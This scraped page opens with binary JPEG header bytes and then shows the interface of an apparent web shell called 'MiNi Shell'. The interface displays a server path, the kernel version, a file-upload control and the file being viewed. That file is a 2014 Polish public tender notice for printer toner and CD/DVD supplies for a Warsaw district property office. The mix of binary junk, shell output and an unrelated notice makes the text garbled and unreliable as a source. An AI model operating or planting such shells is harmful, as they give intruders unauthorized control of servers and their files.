JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140207/24891-N-2014.html

<p class="kh_header"><b>Warszawa: Sprzedaż i sukcesywne dostarczanie materiałów eksploatacyjnych do sprzętu komputerowego i biurowego dla Zakładu Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy.</b><br>
<b>Numer ogłoszenia: 24891 - 2014; data zamieszczenia: 07.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarowania Nieruchomościami w dzielnicy Mokotów m.st. Warszawy , ul. Irysowa 19, 02-660 Warszawa, woj. mazowieckie, tel. 022 5493727, 5493737, faks 022 5493737.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgnmokotow.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż i sukcesywne dostarczanie materiałów eksploatacyjnych do sprzętu komputerowego i biurowego dla Zakładu Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest sprzedaż oraz sukcesywne dostarczenie materiałów eksploatacyjnych do sprzętu komputerowego  tonerów, tuszy, taśm bębnów, CD-ROM, DVD-R dla Zakładu Gospodarowania Nieruchomościami w Dzielnicy Mokotów m.st. Warszawy oraz wchodzących w jego skład 6 DOM-ów, w okresie od dnia następującego po dniu podpisania umowy do dnia 31 grudnia 2014 r.
       Materiały eksploatacyjne do sprzętu komputerowego i biurowego dostarczane będą do siedziby ZGN Dzielnicy Mokotów m.st. Warszawy oraz do siedzib ZGN i 6 DOM-ów, których wykaz zawiera Rozdział V SIWZ stanowiący załącznik nr 2 do umowy.
       Materiały eksploatacyjne do sprzętu komputerowego i biurowego dostarczane będą pod wskazane przez Zamawiającego adresy, w ciągu dwóch dni kalendarzowych od otrzymania telefonicznej informacji o konieczności dostawy określonej części zamówionych materiałów eksploatacyjnych i potwierdzeniu zapotrzebowania faxem.
2. Uszczegółowienie przedmiotu zamówienia - tj. dostaw objętych zamówieniem - zawiera: Rozdział IV specyfikacji - Wykaz dostaw tj.: materiałów eksploatacyjnych do sprzętu komputerowego i biurowego wymaganych przez Zamawiającego do dostarczania w okresie obowiązywania umowy.
      2.1. Ilekroć w  Specyfikacji przedmiot zamówienia jest opisany ze wskazaniem znaków towarowych lub pochodzenia to przyjmuje się, że wskazaniom takim towarzysza wyrazy -lub równoważne-. Zamawiający opisując przedmiot zamówienia skorzystał z dyspozycji wyrażonej w art. 29 ust. 3 (z zastrzeżeniami) i wskazał na markę materiałów eksploatacyjnych z uwagi na specyfikę przedmiotu zamówienia oraz brak możliwości jego opisania w sposób wyczerpujący za pomocą dokładnych i zrozumiałych określeń. Opisując przedmiot zamówienia za pomocą znaków towarowych Zamawiający wskazuje tym samym parametry techniczne (w tym pojemność i wydajność) i jakościowe wymaganego towaru.
3. Wykonawca zobowiązuje się do sprzedaży materiałów eksploatacyjnych do sprzętu komputerowego i biurowego zalecanych przez producentów sprzętu, w którym będą pracowały tj.: Minolta, HP, Lexmark, OKI fabrycznie nowych z datą produkcji 2013 - 2014, nieregenerowanych (nie poddanych procesowi ponownego napełnienia), dostarczonych w opakowaniu indywidualnym posiadającym kod tonera, do którego są przeznaczone, a przy tym w opakowaniu posiadającym kod producenta umożliwiający jednoznaczną identyfikację, nierefabrykowanych, wolnych od wad technicznych, kompletnych, zgodnych z właściwymi przepisami, posiadających atesty  oraz pracujących na sprzęcie posiadanym przez Zamawiającego.
3.1. Wykonawca zobowiązuje się do sprzedaży i dostarczania: taśm, tonerów, tuszy do drukarek oraz bębnów do drukarek  będących produktami oryginalnymi, fabrycznie nowymi, nieregenerowanymi, nierefabrykowanymi, posiadającymi znak firmowy producenta, które gwarantują zachowanie dobrej jakości pracy urządzeń biurowych podczas stosowania materiałów eksploatacyjnych, zalecanymi do stosowania przez producenta sprzętu, na którym będą pracowały tj.: Minolta, HP, Lexmark, OKI.
3.2. Wykonawca zobowiązuje się do sprzedaży i dostarczania tonerów, tuszy, taśm, bębnów do drukarek produkowanych przez firmy wskazane przez Wykonawcę w załączniku nr 1 a) do formularza oferty posiadających parametry zgodne z zalecanymi przez producentów sprzętu, w którym będą pracowały tj.: Minolta, HP, Lexmark, OKI.
3.3. Wykonawca zobowiązuje się do udzielania na dostarczone materiały eksploatacyjne do sprzętu komputerowego i biurowego 12 miesięcznej gwarancji o treści zwyczajowo przyjętej i stosowanej w obrocie materiałami eksploatacyjnymi do sprzętu komputerowego i biurowego.
3.4.	Wykonawca zobowiązuje się do transportu, rozładunku i wniesienia do magazynu Zamawiającego wszystkich dostaw objętych niniejszym zamówieniem.
3.5.	Dostarczone materiały eksploatacyjne do sprzętu komputerowego i biurowego nie mogą ograniczać pełnej współpracy z programem drukarek monitorującym stan zasobników z tuszem lub tonerem.
3.6. Sprzedawane i dostarczane materiały eksploatacyjne do sprzętu komputerowego i biurowego, o których mowa w pkt. 3.3. specyfikacji będą wysokiej jakości  i nie będą powodowały utraty praw gwarancji producenta urządzenia , do którego są przeznaczone.
3.7.	W przypadku stwierdzenia przez Zamawiającego, iż którykolwiek z dostarczonych: taśm, tonerów, tuszy do drukarek oraz bębnów do drukarek, o których mowa w § 1 ust. 1 posiada wady, Wykonawca zobowiązany będzie do dokonania na własny koszt jego wymiany na niewadliwy w ciągu dwóch dni kalendarzowych od telefonicznego i potwierdzonego faxem zgłoszenia Wykonawcy przez Zamawiającego istnienia wady.
4. Płyty CD-ROM muszą być produktami oryginalnymi, fabrycznie nowymi, nieregenerowanymi, wolnymi od wad technicznych. Każda płyta CD-ROM ma mieć pojemność przynajmniej 700MB, a ponadto musi być zapakowana w osobnym pudełku i posiadać nadruk producenta, zarówno na płycie, jak i na pudełku.
Płyty CD winny być wysokiej jakości, 700 MB/80min, maksymalna prędkość zapisu: 48.0 x, odporne na zarysowania, jakość wykonania podobna do płyt TDK lub Verbatim.
5. Płyty DVD-R muszą być produktami oryginalnymi, fabrycznie nowymi, nieregenerowanymi  wolnymi od wad technicznych. Każda płyta DVD-R ma mieć pojemność przynajmniej 4,7 GB, a ponadto musi być zapakowana w osobnym pudełku i posiadać nadruk producenta, zarówno na płycie jak i na pudełku.
Płyty DVD winny być wysokiej jakości, Pojemność płyty minimum 4,7 GB, maksymalna prędkość zapisu	16 x, odporne na zarysowania, jakość wykonania podobna do płyt TDK lub Verbatim.
6. Płyty CD-ROM i DVD-R, o których mowa w pkt. 3.4. i 3.5., nie mogą być gorsze niż płyty CD-ROM i DVD-R firmy TDK lub VERBATIM lub równoważne. Pod pojęciem równoważne płyty CD-ROM i DVD-R Zamawiający rozumie produkty o takich samych parametrach jak produkowane przez TDK lib VERBATIN.
7. Sprzedawane i dostarczane tonery, tusze, taśmy bębny, cartridge będące przedmiotem zamówienia wyszczególnione w Rozdziale IV specyfikacji, muszą być:
      7.1. produktami oryginalnymi (zalecanymi przez producentów sprzętu, w którym będą pracowały tj.: Minolta, HP i OKI oraz Canon, Lexmark) i posiadać znak firmowy producenta,    
      7.2. zgodne z właściwymi przepisami i posiadać atesty,
      7.3. być fabrycznie nowe (za fabrycznie nowy nie uznaje się produktu, gdzie pojemnik został jedynie wyczyszczony  i ponownie wypełniony tonerem lub tuszem), nieregenerowane, nierefabrykowane. Za fabrycznie nowe zamawiający rozumie produkty wykonane z nowych elementów, bez śladów uszkodzenia, w oryginalnych opakowaniach producenta  z widocznym logo producenta, nazwą (typem, symbolem) materiału, numerem katalogowym, opisem zawartości i terminem przydatności do użycia.
7.4. nie poddane procesowi ponownego napełnienia,
7.5. produktami nieograniczającymi współpracy z programem kserokopiarek, drukarek, telefaksów monitorującym stan zasobników z tonerem i tuszem,
7.6. dostarczone w opakowaniu indywidualnym  posiadającym kod tonera, tuszu, taśmy oraz nazwę kserokopiarki, telefaksu, do którego są przeznaczone,
      7.7. dostarczone w opakowaniu indywidualnym  posiadającym kod producenta umożliwiający jednoznaczną identyfikację.
8. Zamawiający dopuszcza składanie ofert równoważnych.
8.1. Pod pojęciem równoważne należy rozumieć tonery, tusze, taśmy, bębny, cartridge  kompatybilne ze sprzętem do którego są zamawiane, o parametrach i właściwościach (pojemność tuszu tonera, wydajność i jakość wydruku) zgodnych lub lepszych z oryginalnymi: tonerami, tuszami, taśmami, bębnami, cartridge produkowanymi przez producenta urządzenia wymienionymi w Rozdziale IV   specyfikacji i nie powodujące utraty przez Zamawiającego gwarancji na sprzęt, której warunki nie obejmują uszkodzeń powstałych w wyniku stosowania materiałów eksploatacyjnych nie zalecanych przez producenta sprzętu.
8.2. W przypadku zaoferowania równoważnych materiałów eksploatacyjnych w celu potwierdzenia, że oferowana dostawa odpowiada wymaganiom określonym przez Zamawiającego Zamawiający żąda:
8.2.1. oświadczenia Wykonawcy oferującego materiały równoważne, że ten zobowiązuje się do zagwarantowania serwisu sprzętu i pokrycia kosztów serwisowania w autoryzowanym serwisie producenta danego sprzętu, w przypadku gdy usterka zostałaby wywołana przez stosowanie produktów równoważnych - zał. nr 6 do specyfikacji istotnych warunków zamówienia,
             8.2.1.1. Za podstawę żądania przez Zamawiającego naprawy drukarki uważa się pisemną opinię autoryzowanego serwisu producenta w/w  sprzętu. Naprawa sprzętu wykonana zostanie w autoryzowanym serwisie producenta danego sprzętu w ciągu 3-ch dni od momentu zgłoszenia  (faksem) Wykonawcy przez zamawiającego konieczności wykonania naprawy.  Koszty związane z naprawą ponosi Wykonawca.
8.2.2. wykazania, że oferowane przez Wykonawcę produkty spełniają wymagania określone przez Zamawiającego i charakteryzują się porównywalną tzn. taką samą lub lepszą jakością wydruku, szybkością schnięcia, kolorystyką, pojemnością, wydajnością oraz posiadają analogiczne funkcje np. informacje o stanie zużycia wkładu. W przypadku zaoferowania rozwiązań równoważnych Wykonawca musi załączyć do oferty szczegółowy opis w formie tabeli porównawczej, potwierdzający, że produkt ten posiada takie same lub lepsze parametry techniczne, jakościowe i użytkowe wraz z podaniem jego nazwy producenta, kodu lub symbolu dot. każdej właściwej pozycji asortymentowej, do której produkt równoważny się odnosi,
8.2.3 raportów z testów potwierdzających, że podana wydajność jest wynikiem przeprowadzenia testów zgodnie z normami: ISO/IEC 19752 dla tonerów monochromatycznych, ISO/IEC 19798 dla wkładów do drukarek kolorowych i ISO/IEC 24711 dla nabojów do drukarek atramentowych, wystawionych przez niezależny podmiot posiadający stosowną akredytację w zakresie badania produktów pod kątem spełniania  powyższych norm lub zaświadczenie wydane przez niezależny podmiot posiadający stosowną akredytację w zakresie badania produktów pod potwierdzające spełnianie powyższych norm,
8.2.4. karty charakterystyki bezpieczeństwa materiałów eksploatacyjnych przygotowane zgodnie z wymogami Dyrektywy Unii Europejskiej 91/155/EEC wraz z poprawkami 2001/58/EC lub równoważnymi,
  8.2.5. certyfikatu ISO 14001 lub równoważnego na proces produkcji materiałów eksploatacyjnych, pozwalający zweryfikować czy producent spełnia przepisy związane z ochroną środowiska oraz potwierdzający, że materiały są produkowane w sposób bezpieczny i niewpływający negatywnie na środowisko.
8.2.6. oświadczenia producenta materiału eksploatacyjnego równoważnego, że oferowane kasety z tonerem i/lub tusze są materiałami fabrycznie nowymi, wolnymi od wad, kompletnymi a żaden z elementów kasety z tonerem i/lub tuszu nie jest wtórnie wykorzystany ani nie pochodzi z procesu recyklingu,
8.2.7. dokumentu potwierdzającego, że oferowane materiały eksploatacyjne posiadają termin przydatności nie krótszy niż 12 miesięcy, licząc od dnia zainstalowania kasety w drukarce (niezależnie od daty zakupu i okresu przechowywania zamkniętej kasety w magazynie),
8.2.8. oświadczenia producenta materiału równoważnego, że proces produkcji i stosowanie wyprodukowanych przez niego materiałów eksploatacyjnych nie naruszy praw patentowych producentów oryginalnych tonerów, tuszy  i kaset,
8.2.9. oświadczenia Wykonawcy, że oferowane równoważne materiały eksploatacyjne nie powodują ograniczeń funkcji i możliwości sprzętu oraz jakości wydruku opisanych w warunkach technicznych producenta sprzętu (pełna kompatybilność z oprogramowaniem sprzętu: drukarki, faksu lub ksero, informowanie i liczbie wydrukowanych stron  oraz poziomie zużycia toneru/tuszu).
9. Miejsce dostawy: materiały eksploatacyjne muszą być dostarczane pod wskazane przez Zamawiającego adresy -zgodnie z wykazem zawartym w Rozdziale V specyfikacji-  w ciągu dwóch dni kalendarzowych od otrzymania telefonicznej informacji o konieczności dostawy materiałów eksploatacyjnych oraz po potwierdzeniu zapotrzebowania faxem. Wykonawca zobowiązany będzie do transportu oraz rozładunku i wniesienia do magazynów Zamawiającego sprowadzonego materiałów eksploatacyjnych do sprzętu komputerowego i biurowego.
10. Koszty załadunku, transportu oraz rozładunku i wniesienia do magazynu Zamawiającego wszystkich dostaw obciążać będą Wykonawcę.
11. Dostarczone materiały eksploatacyjne do sprzętu komputerowego i biurowego nie mogą ograniczać pełnej współpracy z programem drukarek i kserokopiarek monitorującym stan zasobników z tuszem lub tonerem.
12. W okresie obowiązywania umowy Zamawiający zastrzega sobie prawo zmiany ilości zapotrzebowania na poszczególne typy materiałów eksploatacyjnych do sprzętu komputerowego i biurowego spośród wskazanych w Rozdziale IV specyfikacji, w obrębie całkowitej ceny za realizację zamówienia w ramach danej umowy.
13. Zamawiający zastrzega sobie możliwość rezygnacji z zakupu pewnej części materiałów eksploatacyjnych, o których mowa w Rozdziale IV specyfikacji istotnych warunków zamówienia, jednakże nie więcej niż do 20% wartości zamówienia.
14. Podstawą obliczenia wartości poszczególnych dostaw będą ceny jednostkowe ceny materiałów eksploatacyjnych do sprzętu komputerowego i biurowego wymaganych przez Zamawiającego do  sprzedaży i sukcesywnego dostarczania, wskazane przez Wykonawcę w formularzu cenowym (załącznik nr 1) do oferty.
Ceny przedstawione przez Wykonawcę w formularzu cenowym (załącznik nr 1) do oferty będą cenami obowiązującymi przez cały czas trwania umowy i nie będą podlegały żadnym zmianom lub waloryzacji.
15. Wykonawca udzieli gwarancję na sprzedawane i dostarczane: tonery, tusze, taśmy, bębny i inne zamawiane produkty na okres 12 miesięcy o treści zwyczajowo przyjętej i stosowanej w obrocie materiałami eksploatacyjnymi do sprzętu komputerowego i biurowego.
16. Szczegółowy zakres obowiązków Wykonawcy zawarty jest w § 1 istotnych postanowień umowy, które stanowią III Rozdział specyfikacji.
17. Czynności, o których mowa w pkt. 3. specyfikacji, mają być wykonane zgodnie z warunkami wynikającymi z Istotnych postanowień umowy stanowiących Rozdział III specyfikacji istotnych warunków zamówienia.
17.1. Zamawiający zastrzega sobie możliwość wprowadzenia zmian postanowień umowy zawartej w wyniku rozstrzygnięcia przedmiotowego postępowania o ile warunkiem wprowadzenia takich zmian będą między innymi okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te będą korzystne dla Zamawiającego oraz w przypadku zmiany porządku prawnego, a także w przypadku zmian zawartych w specyfikacji istotnych warunków zamówienia. Zmiany, o których mowa w zdaniu pierwszym wymagają formy pisemnej pod rygorem nieważności w tym:
          17.1.1. Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
a)	zmiany terminu wykonania Przedmiotu zamówienia w następstwie wydłużonych/wykraczających poza ustawowe terminy procedur administracyjnych oraz innych terminów spraw urzędowych, mających wpływ na terminy realizacji Przedmiotu zamówienia, o ile Wykonawca przy wykazaniu należytej staranności nie może dotrzymać terminu wykonania Przedmiotu zamówienia;
b)	ograniczenia środków budżetowych na realizację Przedmiotu zamówienia;
c)	zmiany zakresu rzeczowego i finansowego;
d)	zmiany osób uczestniczących w realizacji Przedmiotu zamówienia;
e)	zmiany wymaganej sprawozdawczości i rozliczeń kosztów wykonania Przedmiotu zamówienia;
f)	zmiany regulacji prawnych wprowadzonych w życie po dacie zawarcia umowy wraz ze skutkami takiej zmiany regulacji prawnych.

18. Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy dostawy  zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 7 ustawy, stanowiących nie więcej niż 20 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia tj. sprzedaży i dostawie materiałów eksploatacyjnych do sprzętu komputerowego i biurowego - tonerów, tuszy, taśm bębnów, CD-ROM, DVD-R - dla Zakładu Gospodarowania Nieruchomościami w Dzielnicy Mokotów m. st. Warszawy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.23.70.00-9, 30.19.21.13-6, 30.19.23.00-4, 30.12.51.00-2, 30.12.51.10-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
 Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 5 do wzoru formularza oferty (pkt. 9.2.1. siwz)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni z postępowania na podstawie art. 24 ust. 1 i ust. 2 pkt. 5. ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 ze zm.), a także spełniający warunki, o których mowa w art. 22 ust. 1 pkt. 1 - 4 w/w ustawy dotyczące:
a) 	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)	posiadania wiedzy i doświadczenia,
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d) 	 sytuacji ekonomicznej i finansowej.
 Ocena spełnienia warunków zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu stanowiącego załącznik nr 5 do wzoru formularza oferty (pkt. 9.2.1. siwz) oraz w oparciu o potwierdzenie spełniania warunków w zakresie wskazanym poniżej:

1.1. 	Ad. wiedza i doświadczenie:
Wykonawca musi wykazać, że posiada wiedzę i doświadczenie w zakresie realizacji usług stanowiących przedmiot zamówienia, tj. musi wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje (w ramach umowy lub umów) co najmniej 1 dostawę polegającą na dostawie tonerów, tuszów, taśm, bębnów do drukarek do firm lub instytucji o wartości nie mniejszej niż 200.000 zł brutto (w przypadku wykazania doświadczenia usługami wykonywanymi Zamawiający żąda, żeby Wykonawca wykazał, nie później niż na dzień składania ofert wykonanie w/w dostaw o wartości nie mniejszej niż 200.000 zł).
Spełnienie w/w  warunku Zamawiający oceniał będzie na podstawie załączonego do oferty wykazu wykonanych głównych dostaw, określonych w pkt. 9.2.2 SIWZ, sporządzonego wg wzoru stanowiącego załącznik nr 3 do formularza oferty i załączonych dowodów, określonych w pkt. 9.2.3. SIWZ  potwierdzających, że wymienione w nim dostawy zostały wykonane w sposób należyty lub są wykonywane należycie.
2. 	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie podmiotów, oddających do dyspozycji Wykonawcy niezbędne zasoby na okres korzystania z nich przy wykonaniu zamówienia, w formie oryginałów. 
Zamawiający wymaga aby składany dokument/dokumenty dotyczyły w szczególności:
-zakresu dostępnych Wykonawcy zasobów innego podmiotu - informację wskazującą, który konkretny zasób jest udostępniany. W przypadku udostępniania osób zdolnych do wykonania zamówienia należy imiennie wskazać osoby, które będą uczestniczyć w wykonaniu zamówienia. W przypadku udostępnienia wiedzy i doświadczenia należy wskazać konkretną formę uczestnictwa w realizacji zamówienia (np. podwykonawstwo, doradztwo, itp.). W przypadku udostępnienia potencjału technicznego należy wskazać przekazanie do dyspozycji Wykonawcy narzędzia, wyposażenie zakładu, urządzeń technicznych lub na zasadzie podwykonawstwa. W przypadku udostępnienia zdolności finansowych/  przeniesienie własności pieniędzy lub pozostawienie do dyspozycji  Wykonawcy środków pieniężnych albo ponoszenie solidarnej odpowiedzialności za finansowanie nakładów + wykazanie, iż podmiot trzeci posiada środki finansowe lub zdolność kredytową w niezbędnym rozmiarze.
-sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia.
-charakteru stosunku , jaki będzie łączył wykonawcę z innym podmiotem. 
-zakresu i okresu udziału innego podmiotu  przy wykonywaniu zamówienia,
